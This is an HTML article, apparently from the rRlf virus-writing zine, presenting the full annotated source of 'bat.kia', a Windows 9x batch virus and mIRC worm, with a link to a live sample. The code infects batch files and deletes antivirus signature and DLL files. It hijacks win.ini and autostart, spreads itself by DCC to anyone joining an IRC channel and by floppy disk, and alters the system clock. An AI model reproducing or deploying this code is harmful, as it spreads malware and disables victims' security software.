<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="06.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="08.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>bat.kia by philet0ast3r:</u></b>
<p>This is my seventh virus (my fifth batch-virus), and it was written about Christmas 2001 (hohoho).
<br>It is my first worm. A batch-worm that spreads through mIRC.
<br>Here are some facts:
<br>-bat-infector
<br>-parasitic
<br>-mIRC worm
<br>-spreads via disks
<br>-autostart-secured win.ini-residency
<br>-retro: F-Prot 95, McAfee, Thunderbyte, Norton AntiVirus 2000 (it does not recognize the virus, even if heuristic is at maximum)
<br>-time-control-payload: sets the date to 23.5.2023 and the time to 23:17:05,40 on every run
<br>-message-payload: writes the following to c:\programs\bat.kia\bat.kia.inf
<br>&nbsp;this virus is dedicated to one of the most important persons in my life
<br>&nbsp;i hope we will never lose ourselves
<br>&nbsp;...
<br>&nbsp;bat.kia by philet0ast3r [rRlf]
<br>-copies itself as call-back to the root-directory
<br>-fully compatible to Windows ME, Windows 98, Windows 95 (has been tested)
<br>-size: 2.993 bytes
<p>Well, here is the script (with some comments "-->"; have to be removed for virus to run) ...
<br>phile-name should be bat.kia.bat, but it's not neccessary:
<p>@echo off%_kia%
<br>if '%1=='kia goto kia%2
<br>set kia=%0.bat
<br>if not exist %kia% set kia=%0
<br>if '%kia%==' set kia=autoexec.bat
<br>if exist c:\_kia.bat goto kiag
<br>if exist %kia% goto kiafe
<br>call %kia% kia h %path%
<br>if exist %kia% goto kiafe
<br>goto ekia
<br>:kiah
<br>shift%_kia%
<br>if '%2==' goto kiaxt
<br>if exist %2\%kia% set kia=%2\%kia%
<br>if exist %2%kia% set kia=%2%kia%
<br>if exist %2\%kia%.bat set kia=%2\%kia%.bat
<br>if exist %2%kia%.bat set kia=%2%kia%.bat
<br>if not exist %kia% goto kiah
<br>goto kiaxt
<br>:kiafe
<br>find "kia"<%kia%>c:\_kia.bat
<br>attrib c:\_kia.bat +h
<br>:kiag
<br>command /e:5000 /c c:\_kia kia vir
<p>-->the above is a quite normal infection-routine
<br>-->the hidden call-back-file is also created here
<p>:ekia
<br>ctty nul.kia
<br>if exist c:\_kia.bat del c:\programme\norton~1\s32integ.dll
<br>if exist c:\_kia.bat del c:\programme\f-prot95\fpwm32.dll
<br>if exist c:\_kia.bat del c:\programme\mcafee\scan.dat
<br>if exist c:\_kia.bat del c:\tbavw95\tbscan.sig
<p>-->the above is the retro-routine
<br>-->the avs can not scan without those files
<p>if exist c:\windows\startmen�\programme\autostart\antivir.bat goto rdkia
<br>copy bat.kia.bat c:\windows\ki4.sys
<br>echo @echo off>kiaaa.bat
<br>echo ctty nul>>kiaaa.bat
<br>echo if exist c:\windows\system\bat.kia.bat goto 0k>>kiaaa.bat
<br>echo copy c:\windows\ki4.sys c:\windows\system\bat.kia.bat>>kiaaa.bat
<br>echo :0k>>kiaaa.bat
<br>move kiaaa.bat c:\windows\startmen�\programme\autostart\antivir.bat
<p>-->the above is the autostart-secure-routine for the residency
<br>-->it checks if the win.ini-residency is still working
<p>-->the below is the residency-routine
<br>-->it infects the win.ini
<br>-->the empty lines are neccessary for windows taking this as true win.ini
<p>:rdkia
<br>if exist c:\windows\system\bat.kia.bat goto wykia
<br>copy bat.kia.bat c:\windows\system
<br>copy bat.kia.bat + c:\windows\win.ini c:\windows\system\win.ini
<br>del c:\windows\win.ini
<br>move c:\windows\system\win.ini c:\windows
<br>goto wykia
<p>[windows]
<br>load=c:\windows\system\bat.kia.bat
<br>run=C:\WINDOWS\SYSTEM\cmmpu.exe
<br>NullPort=None
<p>:wykia
<br>echo [script]>kia23.bat
<br>echo n0=on 1:JOIN:#:{ >>kia23.bat
<br>echo n1= /if ( nick == $me ) { halt } >>kia23.bat
<br>echo n2= /.dcc send $nick c:\windows\system\bat.kia.bat >>kia23.bat
<br>echo n3=} >>kia23.bat
<br>if exist c:\mirc\mirc.ini copy kia23.bat c:\mirc\script.ini
<br>if exist c:\mirc32\mirc.ini copy kia23.bat c:\mirc32\script.ini
<br>if exist c:\progra~1\mirc\mirc.ini copy kia23.bat c:\progra~1\mirc\script.ini
<br>if exist c:\progra~1\mirc32\mirc.ini copy kia23.bat c:\progra~1\mirc32\script.ini
<br>del kia23.bat
<p>-->the above is the worm-routine
<br>-->it makes a mIRC-script-file and places it in a possible mIRC-directory
<p>:dikia
<br>command /f /c copy c:\windows\system\bat.kia.bat a:\
<p>-->the above is a command line, that makes it possible to copy to diskettes
<br>-->there will be no error if there is no disk in drive a:
<br>-->or if it is writeprotected or full
<p>:tckia
<br>if exist c:\_kia.bat date 23.05.2023
<br>if exist c:\_kia.bat time 23:17:05,40
<p>-->the lines above are responsible for the time-control-payload
<p>:plkia
<br>if exist c:\programs\bat.kia\bat.kia.inf goto nakia
<br>if exist c:\_kia.bat md c:\programs
<br>md c:\programs\bat.kia
<br>echo this virus is dedicated to one of the most important persons in my life>kia.inf
<br>echo i hope we will never lose ourselves>>kia.inf
<br>echo ...>>kia.inf
<br>echo bat.kia by philet0ast3r [rRlf]>>kia.inf
<br>move kia.inf c:\programs\bat.kia\bat.kia.inf
<br>attrib +s c:\programs\bat.kia\bat.kia.inf
<p>-->the above is the message-payload
<br>-->it writes an inf-file to c:\programs\bat.kia
<br>-->the inf-file has the attribute system-file
<p>:nakia
<br>set kia=
<br>if exist !!kia.bat del !!kia.bat
<br>goto kiaend
<br>:kiaxt
<br>echo.>!!kia.bat
<br>!!kia.bat
<br>:kiavir
<br>for %%a in (*.bat ..\*.bat c:*.bat) do call c:\_kia kia i %%a
<br>exit kia
<br>:kiai
<br>find "kia"<%3>nul
<br>if not errorlevel 1 goto kiaj
<br>type c:\_kia.bat>kia$
<br>type %3>>kia$
<br>move kia$ %3>nul
<br>exit kia
<br>:kiaj
<br>set kia!=%kia!%1
<br>if %kia!%==1 exit
<br>:kiaend
<p>-->the above is the rest of the infection-routine
<p><a href="07.zip">living virus</a>
</body>
</html>
